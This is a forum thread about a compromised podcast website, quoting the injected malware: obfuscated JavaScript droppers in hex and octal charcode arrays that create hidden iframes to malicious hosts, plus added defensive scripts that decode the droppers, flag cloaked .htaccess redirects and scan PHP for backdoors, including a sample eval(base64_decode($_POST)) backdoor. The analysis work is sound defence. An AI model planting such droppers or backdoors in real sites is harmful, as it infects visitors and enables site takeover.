Author Topic: The Amp hour Site, NOD32 Trojan message  (Read 6516 times)


Offline blackdog

  • Frequent Contributor
  • **
  • Posts: 580
  • Country: nl
  • Please stop pushing bullshit...
The Amp hour Site, NOD32 Trojan message
« on: March 05, 2013, 04:53:00 pm »
Hi
When I try to visit the Amp Hour site I see a trojan message from my antivirus software (NOD32).
Anyone else have this problem?

Kind regards
Blackdog
“Two things are infinite, the universe and human stupidity, and I am not yet completely sure about the universe.”
 

Offline TerminalJack505

  • Super Contributor
  • ***
  • Posts: 1205
  • Country: 00
Re: The Amp hour Site, NOD32 Trojan message
« Reply #1 on: March 05, 2013, 04:58:53 pm »
The last time I visited I got a message regarding a missing plug-in.  I checked to see which plug-in it was and it was Java.  I thought that was pretty suspicious. 

I'm not sure why that particular site would be using any Java applets.  Of course Java is plagued with security vulnerabilities.
 

Online mariush

  • Super Contributor
  • ***
  • Posts: 3814
  • Country: ro
  • .
Re: The Amp hour Site, NOD32 Trojan message
« Reply #2 on: March 05, 2013, 05:02:04 pm »
Indeed, I also got a request to load Java plugin, which these days doesn't sound like a good idea.

VirusTotal confirms something's fishy:

https://www.virustotal.com/en/file/6f77869559979c2d7a0b430071b94d97e8f99504304b3a5fd61a219f44ac00c3/analysis/1362502792/


Engine                 Result                                       Update
Avast                  JS:Redirector-AHD [Trj]                      20130305
BitDefender            JS:Trojan.JS.Redirector.BQ                   20130305
F-Secure               JS:Trojan.JS.Redirector.BQ                   20130305
Fortinet               JS/Iframe.W!tr                               20130305
GData                  JS:Trojan.JS.Redirector.BQ                   20130305
McAfee-GW-Edition      Heuristic.BehavesLike.JS.Infected.A          20130305
MicroWorld-eScan       JS:Trojan.JS.Redirector.BQ                   20130305
nProtect               JS:Trojan.JS.Redirector.BQ                   20130305
VIPRE                  Trojan.JS.Obfuscator.aa (v)                  20130305
 

Offline robrenz

  • Super Contributor
  • ***
  • Posts: 3035
  • Country: us
  • Real Machinist, Wannabe EE
Re: The Amp hour Site, NOD32 Trojan message
« Reply #3 on: March 05, 2013, 05:05:08 pm »
I just listened to the Amp hour 4 hours ago and I got no messages from my virus software and was not asked to load anything.  I just tried again now and same result, no problems.

Offline justanothercanuck

  • Frequent Contributor
  • **
  • Posts: 390
  • Country: ca
  • Doing retro repairs...
Re: The Amp hour Site, NOD32 Trojan message
« Reply #4 on: March 05, 2013, 05:13:16 pm »
Another script that got slipped into the site code...

Code: [Select]
<div id="ujck">
<iframe src="http:// fres. edomena .pl/ esd. php" style="position: absolute; border: 0px none; height: 1px; width: 1px; left: 1px; top: 1px;">
</div>
« Last Edit: March 05, 2013, 05:16:30 pm by justanothercanuck »
Maintain your old electronics!  If you don't preserve it, it could be lost forever!
 

Online PA0PBZ

  • Super Contributor
  • ***
  • Posts: 4137
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #5 on: March 05, 2013, 06:13:09 pm »

Code: [Select]
(function() {
    var ujck = document.createElement('iframe');

    ujck.src = 'http://fres.edomena.pl/esd.php';
    ujck.style.position = 'absolute';
    ujck.style.border = '0';
    ujck.style.height = '1px';
    ujck.style.width = '1px';
    ujck.style.left = '1px';
    ujck.style.top = '1px';

    if (!document.getElementById('ujck')) {
        document.write('<div id=\'ujck\'></div>');
        document.getElementById('ujck').appendChild(ujck);
    }
})();
Keyboard error: Press F1 to continue.
 

Online PA0PBZ

  • Super Contributor
  • ***
  • Posts: 4137
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #6 on: March 05, 2013, 06:24:39 pm »
Also, I don't like these things on a web page:

Code: [Select]
  asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x76,
0x61, 0x72, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x20, 0x3d, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x63, 0x72, 0x65, 0x61,
0x74, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x28, 0x27, 0x69, 0x66, 0x72, 0x61, 0x6d, 0x65, 0x27, 0x29, 0x3b, 0xd, 0xa, 0xd, 0xa,
0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x72, 0x63, 0x20, 0x3d, 0x20, 0x27, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f,
0x66, 0x72, 0x65, 0x73, 0x2e, 0x65, 0x64, 0x6f, 0x6d, 0x65, 0x6e, 0x61, 0x2e, 0x70, 0x6c, 0x2f, 0x65, 0x73, 0x64, 0x2e, 0x70, 0x68, 0x70,
0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x70, 0x6f, 0x73, 0x69,
0x74, 0x69, 0x6f, 0x6e, 0x20, 0x3d, 0x20, 0x27, 0x61, 0x62, 0x73, 0x6f, 0x6c, 0x75, 0x74, 0x65, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20,
0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x62, 0x6f, 0x72, 0x64, 0x65, 0x72, 0x20, 0x3d, 0x20, 0x27, 0x30,
0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x68, 0x65, 0x69, 0x67,
0x68, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73,
0x74, 0x79, 0x6c, 0x65, 0x2e, 0x77, 0x69, 0x64, 0x74, 0x68, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20,
0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x6c, 0x65, 0x66, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70,
0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x74, 0x6f, 0x70,
0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x20, 0x28, 0x21, 0x64, 0x6f,
0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27,
0x75, 0x6a, 0x63, 0x6b, 0x27, 0x29, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75,
0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x27, 0x3c, 0x64, 0x69, 0x76, 0x20, 0x69, 0x64, 0x3d, 0x5c, 0x27, 0x75,
0x6a, 0x63, 0x6b, 0x5c, 0x27, 0x3e, 0x3c, 0x2f, 0x64, 0x69, 0x76, 0x3e, 0x27, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79,
0x49, 0x64, 0x28, 0x27, 0x75, 0x6a, 0x63, 0x6b, 0x27, 0x29, 0x2e, 0x61, 0x70, 0x70, 0x65, 0x6e, 0x64, 0x43, 0x68, 0x69, 0x6c, 0x64, 0x28,
0x75, 0x6a, 0x63, 0x6b, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x7d, 0xd, 0xa, 0x7d, 0x29, 0x28, 0x29, 0x3b];
try {
   document.body |= 1
   } catch (gdsgsdg) {
   zz = 3;
   dbshre = 159;
   if (dbshre) {
      vfvwe = 0;
      try {} catch (agdsg) {
         vfvwe = 1;
   }
   if (!vfvwe) {
      e = window["eval"];
   }
   s = "";
   for (i = 0; i - 480 != 0; i++) {
      if (window.document) s += String.fromCharCode(asgq[i]);
   }
   z = s;
   e(s);
   }
 }
   //@ sourceURL=/inline-128596b04ba.js


 :palm:
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #7 on: March 07, 2013, 08:02:32 am »
Sigh, another compromised site... possibly via a third-party plugin, a theme running an old version of timthumb.php, or just an old version of the site. Windows users should keep away from the site until it has been cleaned, as this attack is targeting Windows machines.
HostFission - Full Server Monitoring and Management Solutions.
https://hostfission.com/
https://twitter.com/HostFission

I volunteer my time to manage this server, if you would like to support this work I have a patreon here:
https://www.patreon.com/gnif
 

Offline mrflibble

  • Super Contributor
  • ***
  • Posts: 1947
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #8 on: March 07, 2013, 03:28:10 pm »
Also, I don't like these things on a web page:

Code: [Select]
  asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x76,
...

That asgq thing is yet another iframe:
Code: [Select]
...
    cgohp.src = 'http://mures-goldis.ro/clik.php';
...

I was expecting something worse. :P
 

Offline FrozenHaxor

  • Contributor
  • Posts: 29
  • Country: pl
    • My random stuff
Re: The Amp hour Site, NOD32 Trojan message
« Reply #9 on: March 11, 2013, 01:48:17 pm »
I had this problem once. It's a local PC virus that searches for FileZilla and other FTP applications' saved FTP data.

The virus sends the data to some Indian Nigerian scam center and they add a slice of malicious code to the end of every page's code...

I recommend changing every login and scanning the entire PC.
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #10 on: March 12, 2013, 06:44:35 am »
I had this problem once. It's a local PC virus that searches for FileZilla and other FTP applications' saved FTP data.

The virus sends the data to some Indian Nigerian scam center and they add a slice of malicious code to the end of every page's code...

I recommend changing every login and scanning the entire PC.

No, it is not. The site has had some code injected into it; this is a server-side issue. I deal with these often, and they are usually caused by a script kiddie that has infected old versions of sites using WordPress, the old version of the timthumb image-resize script, or poorly written plugins.

If it was client-side, you would be the only one reporting it, and I would not be able to see the injected code on my clean Linux machine.
 

Offline baljemmett

  • Supporter
  • ****
  • Posts: 666
  • Country: gb
Re: The Amp hour Site, NOD32 Trojan message
« Reply #11 on: March 12, 2013, 06:13:08 pm »
I had this problem once. It's a local PC virus  that searches for FileZilla and other FTP applications' saved FTP data.

No, it is not, the site has had some code injected into it, this is a server side issue, [...] If it was client side, you would be the only one reporting it, and I would not be able to see the injected code on my clean Linux machine.

I think FrozenHaxor was suggesting an infection vector, rather than that the malicious code was being injected locally.  As I recall, a little while back both the Amp Hour site and parts of this site were hit by something like this* at the same time, despite apparently being on separate servers -- given that, a decent sweep of any and all machines from which Dave accesses the sites would indeed be prudent.  I think it was mentioned at the time, though, so hopefully Dave did exactly that!  Of course, making sure the sites themselves are up-to-date regarding known vulnerabilities should be a given...


* Some redirects in .htaccess, I seem to recall, that was directing traffic to a server that mostly returned 'ok' but sometimes returned unpleasant grotware.
 

Offline Nermash

  • Frequent Contributor
  • **
  • Posts: 256
Re: The Amp hour Site, NOD32 Trojan message
« Reply #12 on: March 13, 2013, 07:28:16 am »
I just got the Reveton trojan when trying to download the AmpHour mp3. There was also a popup asking to run some crap when I started the stream. Some lame ass has taken control of the site, be careful!

Update: It looks OK now, I am not able to reproduce the infection again.
« Last Edit: March 13, 2013, 07:41:22 am by Nermash »
 

Offline justanothercanuck

  • Frequent Contributor
  • **
  • Posts: 390
  • Country: ca
  • Doing retro repairs...
Re: The Amp hour Site, NOD32 Trojan message
« Reply #13 on: March 13, 2013, 09:31:32 am »
No, it's still there... Same BS as before. It doesn't trigger all the time; there have to be some requirements met before it pushes the Java and Acrobat exploits... That's why sometimes you see "ok" and other times you get the viruses.

Code: [Select]
<script type="text/rocketscript" language="javascript" >ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0165,0144,0151,0155,0146,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0145,0166,0145,0162,0167,0157,0162,0170,056,0144,0145,057,0145,0163,0144,056,0160,0150,0160,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0165,0144,0151,0155,0146,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156
,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0165,0144,0151,0155,0146,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0165,0144,0151,0155,0146,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0165,0144,0151,0155,0146,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+488!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>
Code: [Select]
(function() {
    var udimf = document.createElement('iframe');

    udimf.src = 'http:// ever worx .de/ esd .php';
    udimf.style.position = 'absolute';
    udimf.style.border = '0';
    udimf.style.height = '1px';
    udimf.style.width = '1px';
    udimf.style.left = '1px';
    udimf.style.top = '1px';

    if (!document.getElementById('udimf')) {
        document.write('<div id=\'udimf\'></div>');
        document.getElementById('udimf').appendChild(udimf);
    }
})();
« Last Edit: March 13, 2013, 11:08:17 am by justanothercanuck »
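The two droppers quoted in this thread (the hex asgq = [0x28, ...] array in PA0PBZ's post and the octal new Array(050, 0146, ...) form in the post just above) are the same trick: the iframe injector is stored as a list of character codes, rebuilt with String.fromCharCode and handed to window.eval, so nothing greppable such as an URL or the word "iframe" appears in the page source. The following is an added example, not code from the thread: a Python decoder that parses such arrays with JavaScript's literal rules (0x hex, leading-zero octal, decimal), decodes them and pulls out the iframe target without ever executing the script. The sample payload is constructed for the example and points at a hypothetical host, dropper.example.invalid.

```python
"""Static decoder for charcode-array JavaScript droppers (added example)."""
import re

# JavaScript numeric literals, tried in this order: hex, legacy leading-zero
# octal, then decimal.
_NUM = re.compile(r'0[xX][0-9a-fA-F]+|0[0-7]+|\d+')
# A literal array of at least two numbers, written as [..] or new Array(..).
_ARRAY = re.compile(
    r'(?:\[|new\s+Array\s*\()\s*'
    r'((?:0[xX][0-9a-fA-F]+|0[0-7]+|\d+)\s*(?:,\s*(?:0[xX][0-9a-fA-F]+|0[0-7]+|\d+)\s*)+)'
    r'[\]\)]')
# Both ways the decoded payload names its target: x.src = '...' or <iframe src="...">
_IFRAME_SRC = re.compile(
    r"""\.src\s*=\s*['"]([^'"]+)['"]|<iframe[^>]*\ssrc\s*=\s*['"]([^'"]+)['"]""", re.I)


def js_int(token):
    """Parse a JS integer literal the way the victim's browser would."""
    if token[:2].lower() == '0x':
        return int(token, 16)
    if len(token) > 1 and token[0] == '0':   # 0146 -> 102, legacy octal
        return int(token, 8)
    return int(token)


def find_charcode_arrays(script, min_len=16):
    """Return every numeric array literal in `script`, decoded as a string.

    Short arrays are skipped: a real payload is hundreds of codes long, while
    ordinary page scripts contain plenty of small numeric arrays.
    """
    decoded = []
    for m in _ARRAY.finditer(script):
        codes = [js_int(t) for t in _NUM.findall(m.group(1))]
        if len(codes) >= min_len and all(0 <= c < 0x110000 for c in codes):
            decoded.append(''.join(chr(c) for c in codes))
    return decoded


def extract_iframe_targets(script):
    """Return the iframe URLs hidden in any charcode array of `script`."""
    targets = []
    for payload in find_charcode_arrays(script):
        for m in _IFRAME_SRC.finditer(payload):
            targets.append(m.group(1) or m.group(2))
    return targets


# Constructed sample (not the thread's real payload): the same dropper shape
# as on the page, aimed at a hypothetical host, encoded both ways seen above.
_PLAIN = ("(function() {\r\n"
          "    var x = document.createElement('iframe');\r\n"
          "    x.src = 'http://dropper.example.invalid/esd.php';\r\n"
          "    x.style.height = '1px';\r\n"
          "    document.body.appendChild(x);\r\n"
          "})();")
SAMPLE_HEX = ("asgq = [" + ", ".join(hex(ord(c)) for c in _PLAIN) + "];\n"
              "e = window['eval']; e(String.fromCharCode.apply(null, asgq));")
SAMPLE_OCT = ("f = new Array(" + ",".join("0%o" % ord(c) for c in _PLAIN) + ");"
              "w=f;s='';for(i=0;i<w.length;i++)s=s+String.fromCharCode(w[i]);eval(s)")

if __name__ == '__main__':
    for label, sample in (('hex', SAMPLE_HEX), ('octal', SAMPLE_OCT)):
        print(label, extract_iframe_targets(sample))
```

Feed it the raw HTML as served (curl, not a browser's "view source", which may already have run the script), and treat every host it returns as an indicator to block and to search the rest of the site for. It only handles the direct fromCharCode shape used here; a sample that reverses the array or subtracts an offset first needs that step mirrored before decoding.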
 

Offline ChrisGammell

  • Supporter
  • ****
  • Posts: 157
    • Chris Gammell's Analog Life
Re: The Amp hour Site, NOD32 Trojan message
« Reply #14 on: March 13, 2013, 01:57:52 pm »
As for "triggers", it usually is dependent on how you get to the site. Code I've found and cleaned out has prioritized people that find the site by search engines vs people that visit it directly; the idea being that if it doesn't happen to me when I go to the site, it will take longer to catch.

I've been hunting this damn thing down and killing it for weeks (as I found it, there was usually some lag). Now I actually have some software on the backend that detects when things are changed and it's looking specifically for malware (using the Sucuri plugin and monitoring site).

The real problem, as alluded to above, is that there was a backdoor placed at some time in the past. Obviously I have not found it yet. I've updated and scanned damn near everything. My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

I think my next step is to start from scratch, but I can't even imagine how many things that will break.
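The "trigger" behaviour Chris describes (visitors arriving from a search engine get the redirect, the owner who types the address sees a clean site) and the .htaccess redirects baljemmett recalls are usually the same thing: a RewriteCond on HTTP_REFERER or HTTP_USER_AGENT placed in front of a RewriteRule that sends the request off-site. The following is an added example, not code from the thread or from the site: a Python check that groups RewriteCond/RewriteRule pairs in an .htaccess file and reports redirects that only fire for some referrers or user agents. The sample .htaccess is constructed for the example; the redirect host redirector.example.invalid is hypothetical.

```python
"""Flag referrer- or user-agent-cloaked redirects in an .htaccess file (added example)."""
import re

SEARCH_ENGINE_HINTS = re.compile(r'google|bing|yahoo|ask\.|aol|duckduckgo|yandex|baidu', re.I)
_ABS_URL = re.compile(r'^https?://([^/?#]+)', re.I)


def parse_rewrite_blocks(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    blocks, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split()
        name = parts[0].lower()
        if name == 'rewritecond' and len(parts) >= 3:
            pending.append({'test': parts[1], 'pattern': parts[2],
                            'flags': parts[3] if len(parts) > 3 else ''})
        elif name == 'rewriterule' and len(parts) >= 3:
            blocks.append({'conds': pending, 'pattern': parts[1], 'target': parts[2],
                           'flags': parts[3] if len(parts) > 3 else ''})
            pending = []          # conditions apply only to the next RewriteRule
    return blocks


def flag_cloaked_redirects(text, site_hosts=()):
    """Return external redirects that are gated on the referrer or user agent."""
    own = {h.lower() for h in site_hosts}
    findings = []
    for b in parse_rewrite_blocks(text):
        m = _ABS_URL.match(b['target'])
        if not m or m.group(1).lower() in own:
            continue              # local rewrite, or a redirect to one of our own hosts
        referer = [c for c in b['conds'] if c['test'].upper() == '%{HTTP_REFERER}']
        ua = [c for c in b['conds'] if c['test'].upper() == '%{HTTP_USER_AGENT}']
        if not referer and not ua:
            continue              # unconditional: everyone sees it, so it is not cloaked
        engine_gated = any(SEARCH_ENGINE_HINTS.search(c['pattern']) for c in referer)
        findings.append({
            'target': b['target'],
            'host': m.group(1),
            'severity': 'high' if engine_gated else 'medium',
            'why': 'external redirect gated on ' + ', '.join(c['test'] for c in referer + ua),
        })
    return findings


# Constructed sample: the stock WordPress block followed by an injected
# search-engine-only redirect of the kind discussed in the thread.
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

RewriteCond %{HTTP_REFERER} .*(google|bing|yahoo|ask|aol).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !.*(bot|crawl|spider).*$ [NC]
RewriteRule .* http://redirector.example.invalid/in.cgi?3 [R=302,L]
"""

if __name__ == '__main__':
    for f in flag_cloaked_redirects(SAMPLE_HTACCESS):
        print(f['severity'], f['target'], '(' + f['why'] + ')')
```

Run it over every .htaccess under the document root, not just the top-level one, since injected copies are often dropped into upload and theme directories. The complementary check from outside is to request the page twice with curl, once with a Referer header naming a search engine and once without, and diff the two responses: a cloaked site answers differently even when the .htaccess looks clean, because the same gating can live in PHP instead.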
 

Offline mrflibble

  • Super Contributor
  • ***
  • Posts: 1947
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #15 on: March 13, 2013, 02:21:29 pm »
My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

Assuming that is the case ... export database, validate & sanitize fields, import sanitized database into a fresh trusted install. That is also assuming the cost for doing the fresh install is low, because you have an image somewhere. The database is where the pain is. Again assuming that the dbase content being compromised is a large part of your problem.
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #16 on: March 16, 2013, 08:51:19 am »
As for "triggers", it usually is dependent on how you get to the site. Code I've found and cleaned out has prioritized people that find the site by search engines vs people that visit it directly; the idea being that if it doesn't happen to me when I go to the site, it will take longer to catch.

I've been hunting this damn thing down and killing it for weeks (as I found it, there was usually some lag). Now I actually have some software on the backend that detects when things are changed and it's looking specifically for malware (using the Sucuri plugin and monitoring site).

The real problem, as alluded to above, is that there was a backdoor placed at some time in the past. Obviously I have not found it yet. I've updated and scanned damn near everything. My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

I think my next step is to start from scratch, but I can't even imagine how many things that will break.

I have seen it exhibit as a WordPress plugin before also; look for strange plugins that look like they are part of the app you are using. A simple, quick way to check for WordPress is to check wp_plugins in the database for code that contains eval/base64_/shell_exec/passthru/exec/system, and finally look for preg_* functions that are being called with '\e' in the pattern (most stupid 'feature' EVER).
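The check gnif describes above is a text search, so it works equally on a plugin directory and on a mysqldump of the database. The following is an added example, not code from the thread: a Python scanner for the functions he lists (eval, base64_*, shell_exec, passthru, exec, system), a few close relatives added here (assert, create_function, gzinflate, str_rot13, proc_open), and preg_* calls whose pattern carries the e modifier, which makes PHP eval the replacement string. A call to an execution sink on the same line as a decoder or as request input ($_POST and friends) is rated high, since that is the shape of the classic one-line backdoor. Both PHP samples are constructed for the example; the "wp_cache_get_options" function name is a hypothetical disguise of the kind gnif mentions.

```python
"""Scan PHP source (files or a database dump) for backdoor markers (added example)."""
import os
import re
from collections import namedtuple

Finding = namedtuple('Finding', 'source line severity detail')

EXEC_SINKS = {'eval', 'assert', 'create_function', 'shell_exec', 'passthru',
              'exec', 'system', 'popen', 'proc_open'}
DECODERS = {'base64_decode', 'gzinflate', 'gzuncompress', 'str_rot13', 'strrev'}
# Longest names first so shell_exec is reported as itself, not as exec.
_DANGER = re.compile(r'\b(' + '|'.join(sorted(EXEC_SINKS | DECODERS, key=len, reverse=True)) + r')\s*\(')
_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE|SERVER)\b')
_PREG = re.compile(r'\bpreg_(?:replace|match|match_all|split)\s*\(\s*(["\'])(.+?)\1', re.S)


def has_e_modifier(pattern):
    """True if a PCRE pattern literal such as '/.*/e' carries the e modifier."""
    if len(pattern) < 2:
        return False
    delim = pattern[0]
    closer = {'(': ')', '[': ']', '{': '}', '<': '>'}.get(delim, delim)
    end = pattern.rfind(closer)
    return end > 0 and 'e' in pattern[end + 1:]


def scan_php_source(src, source='<inline>'):
    """Return Findings for each suspicious line of `src`."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        funcs = {m.group(1) for m in _DANGER.finditer(line)}
        if funcs:
            sink = funcs & EXEC_SINKS
            # execution sink fed by a decoder or by request input: one-liner backdoor shape
            hot = sink and (funcs & DECODERS or _INPUT.search(line))
            findings.append(Finding(source, lineno, 'high' if hot else 'medium',
                                    'calls ' + ', '.join(sorted(funcs))))
        for m in _PREG.finditer(line):
            if has_e_modifier(m.group(2)):
                findings.append(Finding(source, lineno, 'high',
                                        'preg_* with /e modifier: replacement is eval()ed'))
    return findings


def scan_tree(root, exts=('.php', '.inc', '.phtml', '.sql')):
    """Walk a directory (wp-content/, or a folder of dumps) and scan every matching file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    findings.extend(scan_php_source(fh.read(), path))
    return findings


# Constructed samples: a harmless helper that happens to call exec(), and a
# backdoor disguised as a WordPress core function.
LEGIT_SAMPLE = """<?php
function amp_thumb($file) { return exec('convert ' . escapeshellarg($file)); }
"""
BACKDOOR_SAMPLE = """<?php
/* looks like part of WordPress, is not */
function wp_cache_get_options() {
    $k = $_POST['wp_nonce'];
    if (isset($k)) { eval(base64_decode($k)); }
    preg_replace('/.*/e', 'strrev("tsixe_noitcnuf")', '');
}
"""

if __name__ == '__main__':
    import sys
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_php_source(BACKDOOR_SAMPLE, 'sample')
    for f in hits:
        print('%s:%d [%s] %s' % f)
```

Expect noise from legitimate code (image resizers call exec, caching plugins call gzinflate), which is why a lone sink is only medium; the high findings are the ones to read by hand. For the database, dump the tables to a file and point scan_tree at the folder, then compare anything it flags against a fresh copy of the same plugin from wordpress.org rather than trusting the file dates, since a backdoor that was planted months ago looks as old as everything else.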
 

Offline SeanB

  • Super Contributor
  • ***
  • Posts: 15122
  • Country: za
Re: The Amp hour Site, NOD32 Trojan message
« Reply #17 on: April 04, 2013, 06:59:56 pm »
Just look at the current issue of Security Now; it describes Dave's issues to a "T".

http://twit.tv/show/security-now/398

and listen/watch it
 

